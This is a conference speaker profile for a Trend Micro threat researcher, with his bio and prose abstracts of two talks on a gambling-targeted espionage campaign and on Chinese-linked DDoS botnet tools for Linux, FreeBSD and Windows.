Last known affiliation: Trend Micro
Bio: Jaromir Horejsi is a threat researcher at Trend Micro. He specializes in hunting and reverse-engineering threats that target Windows and Linux. He has researched many types of threats over the course of his career, covering threats such as APTs, DDoS botnets, banking Trojans, click fraud and ransomware. He has successfully presented his research at RSAC, SAS, Virus Bulletin, HITB, FIRST, AVAR, Botconf and CARO.
Jaromír Hořejší 🗣 | Daniel Lunghi 🗣
Abstract (click to view)
Despite being illegal in some countries, global online gambling industry growths steadily year after year, flourishing in current environment dominated by the global pandemic. This trend was not surprisingly noticed by advanced threat actors as we observed and analyzed campaigns targeting online gambling platforms.
In this research, we will focus on a multiplatform (Windows and Linux) campaign involving known espionage tools as well as new malware families. Operated by individuals with knowledge of Chinese language, the victims of this campaign are mostly online gambling customers in South East Asia.
We noticed some interesting infection vectors, such as backdoored or fake installers for popular applications, or even for a custom chat application, suggesting a very targeted campaign.
Peter Kálnai 🗣 | Jaromír Hořejší 🗣
Abstract (click to view)
One of capabilities of a malicious botnet is to perform a distributed denial of service (DDoS) attack. Attacks can be performed by various methods like volumetric flooding, slow HTTP attacks or TCP protocol misuse. A DNS amplification is an example of volumetric flooding that became popular recently. It is well known that Trojans for the Windows platform with resources containing Chinese locale have a long tradition of interest in this type of attacks and lack other spying features that Trojans usually possess.
We present a survey of current trends in usage of standalone grey area tools performing DDoS for multiple platforms. The focus is put especially on Linux and FreeBSD versions. These tools are later trojanized by adding persistence using executable droppers or scripts editing crontab. The infection vector starts with automated brute-forcing of the SSH protocol, the malicious flooding tools are then deployed in the compromised system and executed. The competition for resources, such as ports and CPU time, is manifested as the initial attempt to kill and to remove other, possibly flooding, processes. Variants for Windows x86/x64 are co-distributed already with persistence and possess a debug string ‘Chicken’ appearing in the title.
The technical part of this analysis covers versions designed for several platforms and architectures. This involves behavioral aspects of initial droppers, the installation of components performing DDoS, the description of internet communication and the collection of various system and performance statistics. For a better insight, we will demonstrate several bot builders and C&C panels which have been acquired. Screenshots of publicly available advertisements promoting the charged customizability of Linux variants will be displayed.
During our analysis, we connected to the botnets and monitored several C&C servers for a certain period of time which gave us a chance to collect some statistics. Therefore we are able to present particular examples of websites and services which were flooded. We shortly discuss the motivation behind the selection of these attack preferences.